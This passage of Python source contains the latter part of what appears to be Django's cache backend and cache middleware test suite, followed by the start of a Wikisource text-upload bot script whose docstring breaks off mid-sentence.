for #22845 with self.settings(CACHES=caches_setting_for_tests( base=self.base_params, exclude=memcached_excluded_caches, # 60*60*24*365, 1 year TIMEOUT=31536000)): cache.set('future_foo', 'bar') self.assertEqual(cache.get('future_foo'), 'bar') def test_cull(self): # culling isn't implemented, memcached deals with it. pass def test_zero_cull(self): # culling isn't implemented, memcached deals with it. pass def test_memcached_deletes_key_on_failed_set(self): # By default memcached allows objects up to 1MB. For the cache_db session # backend to always use the current session, memcached needs to delete # the old key if it fails to set. # pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can # tell from a quick check of its source code. This is falling back to # the default value exposed by python-memcached on my system. max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576) cache.set('small_value', 'a') self.assertEqual(cache.get('small_value'), 'a') large_value = 'a' * (max_value_length + 1) try: cache.set('small_value', large_value) except Exception: # Some clients (e.g. pylibmc) raise when the value is too large, # while others (e.g. python-memcached) intentionally return True # indicating success. This test is primarily checking that the key # was deleted, so the return/exception behavior for the set() # itself is not important. pass # small_value should be deleted, or set if configured to accept larger values value = cache.get('small_value') self.assertTrue(value is None or value == large_value) def test_close(self): # For clients that don't manage their connections properly, the # connection is closed when the request is complete. signals.request_finished.disconnect(close_old_connections) try: with mock.patch.object(cache._lib.Client, 'disconnect_all', autospec=True) as mock_disconnect: signals.request_finished.send(self.__class__) self.assertIs(mock_disconnect.called, self.should_disconnect_on_close) finally: signals.request_finished.connect(close_old_connections) def test_set_many_returns_failing_keys(self): def fail_set_multi(mapping, *args, **kwargs): return mapping.keys() with mock.patch('%s.Client.set_multi' % self.client_library_name, side_effect=fail_set_multi): failing_keys = cache.set_many({'key': 'value'}) self.assertEqual(failing_keys, ['key']) @unittest.skipUnless(MemcachedCache_params, "MemcachedCache backend not configured") @override_settings(CACHES=caches_setting_for_tests( base=MemcachedCache_params, exclude=memcached_excluded_caches, )) class MemcachedCacheTests(BaseMemcachedTests, TestCase): base_params = MemcachedCache_params client_library_name = 'memcache' def test_memcached_uses_highest_pickle_version(self): # Regression test for #19810 for cache_key in settings.CACHES: with self.subTest(cache_key=cache_key): self.assertEqual(caches[cache_key]._cache.pickleProtocol, pickle.HIGHEST_PROTOCOL) @override_settings(CACHES=caches_setting_for_tests( base=MemcachedCache_params, exclude=memcached_excluded_caches, OPTIONS={'server_max_value_length': 9999}, )) def test_memcached_options(self): self.assertEqual(cache._cache.server_max_value_length, 9999) @unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured") @override_settings(CACHES=caches_setting_for_tests( base=PyLibMCCache_params, exclude=memcached_excluded_caches, )) class PyLibMCCacheTests(BaseMemcachedTests, TestCase): base_params = PyLibMCCache_params client_library_name = 'pylibmc' # libmemcached manages its own connections. should_disconnect_on_close = False # By default, pylibmc/libmemcached don't verify keys client-side and so # this test triggers a server-side bug that causes later tests to fail # (#19914). The `verify_keys` behavior option could be set to True (which # would avoid triggering the server-side bug), however this test would # still fail due to https://github.com/lericson/pylibmc/issues/219. @unittest.skip("triggers a memcached-server bug, causing subsequent tests to fail") def test_invalid_key_characters(self): pass @override_settings(CACHES=caches_setting_for_tests( base=PyLibMCCache_params, exclude=memcached_excluded_caches, OPTIONS={ 'binary': True, 'behaviors': {'tcp_nodelay': True}, }, )) def test_pylibmc_options(self): self.assertTrue(cache._cache.binary) self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True)) @override_settings(CACHES=caches_setting_for_tests( BACKEND='django.core.cache.backends.filebased.FileBasedCache', )) class FileBasedCacheTests(BaseCacheTests, TestCase): """ Specific test cases for the file-based cache. """ def setUp(self): super().setUp() self.dirname = tempfile.mkdtemp() # Caches location cannot be modified through override_settings / modify_settings, # hence settings are manipulated directly here and the setting_changed signal # is triggered manually. for cache_params in settings.CACHES.values(): cache_params.update({'LOCATION': self.dirname}) setting_changed.send(self.__class__, setting='CACHES', enter=False) def tearDown(self): super().tearDown() # Call parent first, as cache.clear() may recreate cache base directory shutil.rmtree(self.dirname) def test_ignores_non_cache_files(self): fname = os.path.join(self.dirname, 'not-a-cache-file') with open(fname, 'w'): os.utime(fname, None) cache.clear() self.assertTrue(os.path.exists(fname), 'Expected cache.clear to ignore non cache files') os.remove(fname) def test_clear_does_not_remove_cache_dir(self): cache.clear() self.assertTrue(os.path.exists(self.dirname), 'Expected cache.clear to keep the cache dir') def test_creates_cache_dir_if_nonexistent(self): os.rmdir(self.dirname) cache.set('foo', 'bar') os.path.exists(self.dirname) def test_get_ignores_enoent(self): cache.set('foo', 'bar') os.unlink(cache._key_to_file('foo')) # Returns the default instead of erroring. self.assertEqual(cache.get('foo', 'baz'), 'baz') def test_get_does_not_ignore_non_filenotfound_exceptions(self): with mock.patch('builtins.open', side_effect=IOError): with self.assertRaises(IOError): cache.get('foo') def test_empty_cache_file_considered_expired(self): cache_file = cache._key_to_file('foo') with open(cache_file, 'wb') as fh: fh.write(b'') with open(cache_file, 'rb') as fh: self.assertIs(cache._is_expired(fh), True) @override_settings(CACHES={ 'default': { 'BACKEND': 'cache.liberal_backend.CacheClass', }, }) class CustomCacheKeyValidationTests(SimpleTestCase): """ Tests for the ability to mixin a custom ``validate_key`` method to a custom cache backend that otherwise inherits from a builtin backend, and override the default key validation. Refs #6447. """ def test_custom_key_validation(self): # this key is both longer than 250 characters, and has spaces key = 'some key with spaces' * 15 val = 'a value' cache.set(key, val) self.assertEqual(cache.get(key), val) @override_settings( CACHES={ 'default': { 'BACKEND': 'cache.closeable_cache.CacheClass', } } ) class CacheClosingTests(SimpleTestCase): def test_close(self): self.assertFalse(cache.closed) signals.request_finished.send(self.__class__) self.assertTrue(cache.closed) DEFAULT_MEMORY_CACHES_SETTINGS = { 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': 'unique-snowflake', } } NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS) NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None class DefaultNonExpiringCacheKeyTests(SimpleTestCase): """ Settings having Cache arguments with a TIMEOUT=None create Caches that will set non-expiring keys. """ def setUp(self): # The 5 minute (300 seconds) default expiration time for keys is # defined in the implementation of the initializer method of the # BaseCache type. self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout def tearDown(self): del(self.DEFAULT_TIMEOUT) def test_default_expiration_time_for_keys_is_5_minutes(self): """The default expiration time of a cache key is 5 minutes. This value is defined in django.core.cache.backends.base.BaseCache.__init__(). """ self.assertEqual(300, self.DEFAULT_TIMEOUT) def test_caches_with_unset_timeout_has_correct_default_timeout(self): """Caches that have the TIMEOUT parameter undefined in the default settings will use the default 5 minute timeout. """ cache = caches[DEFAULT_CACHE_ALIAS] self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout) @override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS) def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self): """Memory caches that have the TIMEOUT parameter set to `None` in the default settings with have `None` as the default timeout. This means "no timeout". """ cache = caches[DEFAULT_CACHE_ALIAS] self.assertIsNone(cache.default_timeout) self.assertIsNone(cache.get_backend_timeout()) @override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS) def test_caches_with_unset_timeout_set_expiring_key(self): """Memory caches that have the TIMEOUT parameter unset will set cache keys having the default 5 minute timeout. """ key = "my-key" value = "my-value" cache = caches[DEFAULT_CACHE_ALIAS] cache.set(key, value) cache_key = cache.make_key(key) self.assertIsNotNone(cache._expire_info[cache_key]) @override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS) def test_caches_set_with_timeout_as_none_set_non_expiring_key(self): """Memory caches that have the TIMEOUT parameter set to `None` will set a non expiring key by default. """ key = "another-key" value = "another-value" cache = caches[DEFAULT_CACHE_ALIAS] cache.set(key, value) cache_key = cache.make_key(key) self.assertIsNone(cache._expire_info[cache_key]) @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix', CACHE_MIDDLEWARE_SECONDS=1, CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, USE_I18N=False, ALLOWED_HOSTS=['.example.com'], ) class CacheUtils(SimpleTestCase): """TestCase for django.utils.cache functions.""" def setUp(self): self.host = 'www.example.com' self.path = '/cache/test/' self.factory = RequestFactory(HTTP_HOST=self.host) def tearDown(self): cache.clear() def _get_request_cache(self, method='GET', query_string=None, update_cache=None): request = self._get_request(self.host, self.path, method, query_string=query_string) request._cache_update_cache = True if not update_cache else update_cache return request def _set_cache(self, request, msg): response = HttpResponse() response.content = msg return UpdateCacheMiddleware().process_response(request, response) def test_patch_vary_headers(self): headers = ( # Initial vary, new headers, resulting vary. (None, ('Accept-Encoding',), 'Accept-Encoding'), ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'), ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'), ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'), ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'), ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'), ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), ) for initial_vary, newheaders, resulting_vary in headers: with self.subTest(initial_vary=initial_vary, newheaders=newheaders): response = HttpResponse() if initial_vary is not None: response['Vary'] = initial_vary patch_vary_headers(response, newheaders) self.assertEqual(response['Vary'], resulting_vary) def test_get_cache_key(self): request = self.factory.get(self.path) response = HttpResponse() # Expect None if no headers have been set yet. self.assertIsNone(get_cache_key(request)) # Set headers to an empty list. learn_cache_key(request, response) self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e' ) # A specified key_prefix is taken into account. key_prefix = 'localprefix' learn_cache_key(request, response, key_prefix=key_prefix) self.assertEqual( get_cache_key(request, key_prefix=key_prefix), 'views.decorators.cache.cache_page.localprefix.GET.' '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e' ) def test_get_cache_key_with_query(self): request = self.factory.get(self.path, {'test': 1}) response = HttpResponse() # Expect None if no headers have been set yet. self.assertIsNone(get_cache_key(request)) # Set headers to an empty list. learn_cache_key(request, response) # The querystring is taken into account. self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' 'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e' ) def test_cache_key_varies_by_url(self): """ get_cache_key keys differ by fully-qualified URL instead of path """ request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com') learn_cache_key(request1, HttpResponse()) request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com') learn_cache_key(request2, HttpResponse()) self.assertNotEqual(get_cache_key(request1), get_cache_key(request2)) def test_learn_cache_key(self): request = self.factory.head(self.path) response = HttpResponse() response['Vary'] = 'Pony' # Make sure that the Vary header is added to the key hash learn_cache_key(request, response) self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' '18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e' ) def test_patch_cache_control(self): tests = ( # Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts (None, {'private': True}, {'private'}), ('', {'private': True}, {'private'}), # Test whether private/public attributes are mutually exclusive ('private', {'private': True}, {'private'}), ('private', {'public': True}, {'public'}), ('public', {'public': True}, {'public'}), ('public', {'private': True}, {'private'}), ('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}), ('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}), ('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}), ) cc_delim_re = re.compile(r'\s*,\s*') for initial_cc, newheaders, expected_cc in tests: with self.subTest(initial_cc=initial_cc, newheaders=newheaders): response = HttpResponse() if initial_cc is not None: response['Cache-Control'] = initial_cc patch_cache_control(response, **newheaders) parts = set(cc_delim_re.split(response['Cache-Control'])) self.assertEqual(parts, expected_cc) @override_settings( CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'KEY_PREFIX': 'cacheprefix', }, }, ) class PrefixedCacheUtils(CacheUtils): pass @override_settings( CACHE_MIDDLEWARE_SECONDS=60, CACHE_MIDDLEWARE_KEY_PREFIX='test', CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, ) class CacheHEADTest(SimpleTestCase): def setUp(self): self.path = '/cache/test/' self.factory = RequestFactory() def tearDown(self): cache.clear() def _set_cache(self, request, msg): response = HttpResponse() response.content = msg return UpdateCacheMiddleware().process_response(request, response) def test_head_caches_correctly(self): test_content = 'test content' request = self.factory.head(self.path) request._cache_update_cache = True self._set_cache(request, test_content) request = self.factory.head(self.path) request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNotNone(get_cache_data) self.assertEqual(test_content.encode(), get_cache_data.content) def test_head_with_cached_get(self): test_content = 'test content' request = self.factory.get(self.path) request._cache_update_cache = True self._set_cache(request, test_content) request = self.factory.head(self.path) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNotNone(get_cache_data) self.assertEqual(test_content.encode(), get_cache_data.content) @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix', CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, LANGUAGES=[ ('en', 'English'), ('es', 'Spanish'), ], ) class CacheI18nTest(TestCase): def setUp(self): self.path = '/cache/test/' self.factory = RequestFactory() def tearDown(self): cache.clear() @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False) def test_cache_key_i18n_translation(self): request = self.factory.get(self.path) lang = translation.get_language() response = HttpResponse() key = learn_cache_key(request, response) self.assertIn(lang, key, "Cache keys should include the language name when translation is active") key2 = get_cache_key(request) self.assertEqual(key, key2) def check_accept_language_vary(self, accept_language, vary, reference_key): request = self.factory.get(self.path) request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0' response = HttpResponse() response['Vary'] = vary key = learn_cache_key(request, response) key2 = get_cache_key(request) self.assertEqual(key, reference_key) self.assertEqual(key2, reference_key) @override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False) def test_cache_key_i18n_translation_accept_language(self): lang = translation.get_language() self.assertEqual(lang, 'en') request = self.factory.get(self.path) request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0' response = HttpResponse() response['Vary'] = 'accept-encoding' key = learn_cache_key(request, response) self.assertIn(lang, key, "Cache keys should include the language name when translation is active") self.check_accept_language_vary( 'en-us', 'cookie, accept-language, accept-encoding', key ) self.check_accept_language_vary( 'en-US', 'cookie, accept-encoding, accept-language', key ) self.check_accept_language_vary( 'en-US,en;q=0.8', 'accept-encoding, accept-language, cookie', key ) self.check_accept_language_vary( 'en-US,en;q=0.8,ko;q=0.6', 'accept-language, cookie, accept-encoding', key ) self.check_accept_language_vary( 'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ', 'accept-encoding, cookie, accept-language', key ) self.check_accept_language_vary( 'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4', 'accept-language, accept-encoding, cookie', key ) self.check_accept_language_vary( 'ko;q=1.0,en;q=0.5', 'cookie, accept-language, accept-encoding', key ) self.check_accept_language_vary( 'ko, en', 'cookie, accept-encoding, accept-language', key ) self.check_accept_language_vary( 'ko-KR, en-US', 'accept-encoding, accept-language, cookie', key ) @override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False) def test_cache_key_i18n_formatting(self): request = self.factory.get(self.path) lang = translation.get_language() response = HttpResponse() key = learn_cache_key(request, response) self.assertIn(lang, key, "Cache keys should include the language name when formatting is active") key2 = get_cache_key(request) self.assertEqual(key, key2) @override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True) def test_cache_key_i18n_timezone(self): request = self.factory.get(self.path) tz = timezone.get_current_timezone_name() response = HttpResponse() key = learn_cache_key(request, response) self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active") key2 = get_cache_key(request) self.assertEqual(key, key2) @override_settings(USE_I18N=False, USE_L10N=False) def test_cache_key_no_i18n(self): request = self.factory.get(self.path) lang = translation.get_language() tz = timezone.get_current_timezone_name() response = HttpResponse() key = learn_cache_key(request, response) self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active") self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active") @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX="test", CACHE_MIDDLEWARE_SECONDS=60, USE_I18N=True, ) def test_middleware(self): def set_cache(request, lang, msg): translation.activate(lang) response = HttpResponse() response.content = msg return UpdateCacheMiddleware().process_response(request, response) # cache with non empty request.GET request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'}) request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) # first access, cache must return None self.assertIsNone(get_cache_data) response = HttpResponse() content = 'Check for cache with QUERY_STRING' response.content = content UpdateCacheMiddleware().process_response(request, response) get_cache_data = FetchFromCacheMiddleware().process_request(request) # cache must return content self.assertIsNotNone(get_cache_data) self.assertEqual(get_cache_data.content, content.encode()) # different QUERY_STRING, cache must be empty request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'}) request._cache_update_cache = True get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNone(get_cache_data) # i18n tests en_message = "Hello world!" es_message = "Hola mundo!" request = self.factory.get(self.path) request._cache_update_cache = True set_cache(request, 'en', en_message) get_cache_data = FetchFromCacheMiddleware().process_request(request) # The cache can be recovered self.assertIsNotNone(get_cache_data) self.assertEqual(get_cache_data.content, en_message.encode()) # change the session language and set content request = self.factory.get(self.path) request._cache_update_cache = True set_cache(request, 'es', es_message) # change again the language translation.activate('en') # retrieve the content from cache get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertEqual(get_cache_data.content, en_message.encode()) # change again the language translation.activate('es') get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertEqual(get_cache_data.content, es_message.encode()) # reset the language translation.deactivate() @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX="test", CACHE_MIDDLEWARE_SECONDS=60, ) def test_middleware_doesnt_cache_streaming_response(self): request = self.factory.get(self.path) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNone(get_cache_data) content = ['Check for cache with streaming content.'] response = StreamingHttpResponse(content) UpdateCacheMiddleware().process_response(request, response) get_cache_data = FetchFromCacheMiddleware().process_request(request) self.assertIsNone(get_cache_data) @override_settings( CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'KEY_PREFIX': 'cacheprefix' }, }, ) class PrefixedCacheI18nTest(CacheI18nTest): pass def hello_world_view(request, value): return HttpResponse('Hello World %s' % value) def csrf_view(request): return HttpResponse(csrf(request)['csrf_token']) @override_settings( CACHE_MIDDLEWARE_ALIAS='other', CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix', CACHE_MIDDLEWARE_SECONDS=30, CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, 'other': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', 'LOCATION': 'other', 'TIMEOUT': '1', }, }, ) class CacheMiddlewareTest(SimpleTestCase): def setUp(self): super().setUp() self.factory = RequestFactory() self.default_cache = caches['default'] self.other_cache = caches['other'] def tearDown(self): self.default_cache.clear() self.other_cache.clear() super().tearDown() def test_constructor(self): """ Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as Middleware vs. usage of CacheMiddleware as view decorator and setting attributes appropriately. """ # If no arguments are passed in construction, it's being used as middleware. middleware = CacheMiddleware() # Now test object attributes against values defined in setUp above self.assertEqual(middleware.cache_timeout, 30) self.assertEqual(middleware.key_prefix, 'middlewareprefix') self.assertEqual(middleware.cache_alias, 'other') # If arguments are being passed in construction, it's being used as a decorator. # First, test with "defaults": as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None) self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30 self.assertEqual(as_view_decorator.key_prefix, '') # Value of DEFAULT_CACHE_ALIAS from django.core.cache self.assertEqual(as_view_decorator.cache_alias, 'default') # Next, test with custom values: as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo') self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60) self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo') self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other') def test_middleware(self): middleware = CacheMiddleware() prefix_middleware = CacheMiddleware(key_prefix='prefix1') timeout_middleware = CacheMiddleware(cache_timeout=1) request = self.factory.get('/view/') # Put the request through the request middleware result = middleware.process_request(request) self.assertIsNone(result) response = hello_world_view(request, '1') # Now put the response through the response middleware response = middleware.process_response(request, response) # Repeating the request should result in a cache hit result = middleware.process_request(request) self.assertIsNotNone(result) self.assertEqual(result.content, b'Hello World 1') # The same request through a different middleware won't hit result = prefix_middleware.process_request(request) self.assertIsNone(result) # The same request with a timeout _will_ hit result = timeout_middleware.process_request(request) self.assertIsNotNone(result) self.assertEqual(result.content, b'Hello World 1') def test_view_decorator(self): # decorate the same view with different cache decorators default_view = cache_page(3)(hello_world_view) default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view) explicit_default_view = cache_page(3, cache='default')(hello_world_view) explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view) other_view = cache_page(1, cache='other')(hello_world_view) other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view) request = self.factory.get('/view/') # Request the view once response = default_view(request, '1') self.assertEqual(response.content, b'Hello World 1') # Request again -- hit the cache response = default_view(request, '2') self.assertEqual(response.content, b'Hello World 1') # Requesting the same view with the explicit cache should yield the same result response = explicit_default_view(request, '3') self.assertEqual(response.content, b'Hello World 1') # Requesting with a prefix will hit a different cache key response = explicit_default_with_prefix_view(request, '4') self.assertEqual(response.content, b'Hello World 4') # Hitting the same view again gives a cache hit response = explicit_default_with_prefix_view(request, '5') self.assertEqual(response.content, b'Hello World 4') # And going back to the implicit cache will hit the same cache response = default_with_prefix_view(request, '6') self.assertEqual(response.content, b'Hello World 4') # Requesting from an alternate cache won't hit cache response = other_view(request, '7') self.assertEqual(response.content, b'Hello World 7') # But a repeated hit will hit cache response = other_view(request, '8') self.assertEqual(response.content, b'Hello World 7') # And prefixing the alternate cache yields yet another cache entry response = other_with_prefix_view(request, '9') self.assertEqual(response.content, b'Hello World 9') # But if we wait a couple of seconds... time.sleep(2) # ... the default cache will still hit caches['default'] response = default_view(request, '11') self.assertEqual(response.content, b'Hello World 1') # ... the default cache with a prefix will still hit response = default_with_prefix_view(request, '12') self.assertEqual(response.content, b'Hello World 4') # ... the explicit default cache will still hit response = explicit_default_view(request, '13') self.assertEqual(response.content, b'Hello World 1') # ... the explicit default cache with a prefix will still hit response = explicit_default_with_prefix_view(request, '14') self.assertEqual(response.content, b'Hello World 4') # .. but a rapidly expiring cache won't hit response = other_view(request, '15') self.assertEqual(response.content, b'Hello World 15') # .. even if it has a prefix response = other_with_prefix_view(request, '16') self.assertEqual(response.content, b'Hello World 16') def test_cached_control_private_not_cached(self): """Responses with 'Cache-Control: private' are not cached.""" view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view)) request = self.factory.get('/view/') response = view_with_private_cache(request, '1') self.assertEqual(response.content, b'Hello World 1') response = view_with_private_cache(request, '2') self.assertEqual(response.content, b'Hello World 2') def test_sensitive_cookie_not_cached(self): """ Django must prevent caching of responses that set a user-specific (and maybe security sensitive) cookie in response to a cookie-less request. """ csrf_middleware = CsrfViewMiddleware() cache_middleware = CacheMiddleware() request = self.factory.get('/view/') self.assertIsNone(cache_middleware.process_request(request)) csrf_middleware.process_view(request, csrf_view, (), {}) response = csrf_view(request) response = csrf_middleware.process_response(request, response) response = cache_middleware.process_response(request, response) # Inserting a CSRF cookie in a cookie-less request prevented caching. self.assertIsNone(cache_middleware.process_request(request)) def test_304_response_has_http_caching_headers_but_not_cached(self): original_view = mock.Mock(return_value=HttpResponseNotModified()) view = cache_page(2)(original_view) request = self.factory.get('/view/') # The view shouldn't be cached on the second call. view(request).close() response = view(request) response.close() self.assertEqual(original_view.call_count, 2) self.assertIsInstance(response, HttpResponseNotModified) self.assertIn('Cache-Control', response) self.assertIn('Expires', response) @override_settings( CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix', CACHE_MIDDLEWARE_SECONDS=1, CACHES={ 'default': { 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', }, }, USE_I18N=False, ) class TestWithTemplateResponse(SimpleTestCase): """ Tests various headers w/ TemplateResponse. Most are probably redundant since they manipulate the same object anyway but the ETag header is 'special' because it relies on the content being complete (which is not necessarily always the case with a TemplateResponse) """ def setUp(self): self.path = '/cache/test/' self.factory = RequestFactory() def tearDown(self): cache.clear() def test_patch_vary_headers(self): headers = ( # Initial vary, new headers, resulting vary. (None, ('Accept-Encoding',), 'Accept-Encoding'), ('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'), ('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'), ('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'), ('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'), ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), (None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'), ('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), ('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'), ) for initial_vary, newheaders, resulting_vary in headers: with self.subTest(initial_vary=initial_vary, newheaders=newheaders): template = engines['django'].from_string("This is a test") response = TemplateResponse(HttpRequest(), template) if initial_vary is not None: response['Vary'] = initial_vary patch_vary_headers(response, newheaders) self.assertEqual(response['Vary'], resulting_vary) def test_get_cache_key(self): request = self.factory.get(self.path) template = engines['django'].from_string("This is a test") response = TemplateResponse(HttpRequest(), template) key_prefix = 'localprefix' # Expect None if no headers have been set yet. self.assertIsNone(get_cache_key(request)) # Set headers to an empty list. learn_cache_key(request, response) self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e' ) # A specified key_prefix is taken into account. learn_cache_key(request, response, key_prefix=key_prefix) self.assertEqual( get_cache_key(request, key_prefix=key_prefix), 'views.decorators.cache.cache_page.localprefix.GET.' '58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e' ) def test_get_cache_key_with_query(self): request = self.factory.get(self.path, {'test': 1}) template = engines['django'].from_string("This is a test") response = TemplateResponse(HttpRequest(), template) # Expect None if no headers have been set yet. self.assertIsNone(get_cache_key(request)) # Set headers to an empty list. learn_cache_key(request, response) # The querystring is taken into account. self.assertEqual( get_cache_key(request), 'views.decorators.cache.cache_page.settingsprefix.GET.' '0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e' ) class TestMakeTemplateFragmentKey(SimpleTestCase): def test_without_vary_on(self): key = make_template_fragment_key('a.fragment') self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e') def test_with_one_vary_on(self): key = make_template_fragment_key('foo', ['abc']) self.assertEqual(key, 'template.cache.foo.900150983cd24fb0d6963f7d28e17f72') def test_with_many_vary_on(self): key = make_template_fragment_key('bar', ['abc', 'def']) self.assertEqual(key, 'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88') def test_proper_escaping(self): key = make_template_fragment_key('spam', ['abc:def%']) self.assertEqual(key, 'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469') class CacheHandlerTest(SimpleTestCase): def test_same_instance(self): """ Attempting to retrieve the same alias should yield the same instance. """ cache1 = caches['default'] cache2 = caches['default'] self.assertIs(cache1, cache2) def test_per_thread(self): """ Requesting the same alias from separate threads should yield separate instances. """ c = [] def runner(): c.append(caches['default']) for x in range(2): t = threading.Thread(target=runner) t.start() t.join() self.assertIsNot(c[0], c[1])
wikisourcetext.py
#!/usr/bin/python # -*- coding: utf-8 -*- """ This bot applies to wikisource sites to upload text. Text is uploaded to pages in Page ns, for a specified Index. Text to be stored, if the page is not-existing, is preloaded from the file used to create the Index page, making the upload feature independent from the format of the file, as long as it is supported by the MW ProofreadPage extension. As alternative, if '-ocr' option is selected, https://tools.wmflabs.org/phetools OCR tool will be used to get text. In this case, also already existing pages with quality value 'Not Proofread' can be treated. '-force' will override existing page in this case. TODO: update params + handle quality level The following parameters are supported: -index:... name of the index page. -pages:<start>-<end>,...<start>-<end>,<start>-<end> Page range to upload; optional, start=1, end=djvu file number of images. Page ranges can be specified as: | A-B -> pages A until B | A- -> pages A until number of images | A -> just page A | -B -> pages 1 until B -showdiff: show difference between current text and new text when saving the page. -ocr: use OCR tools hosted on https://tools.wmflabs.org. By 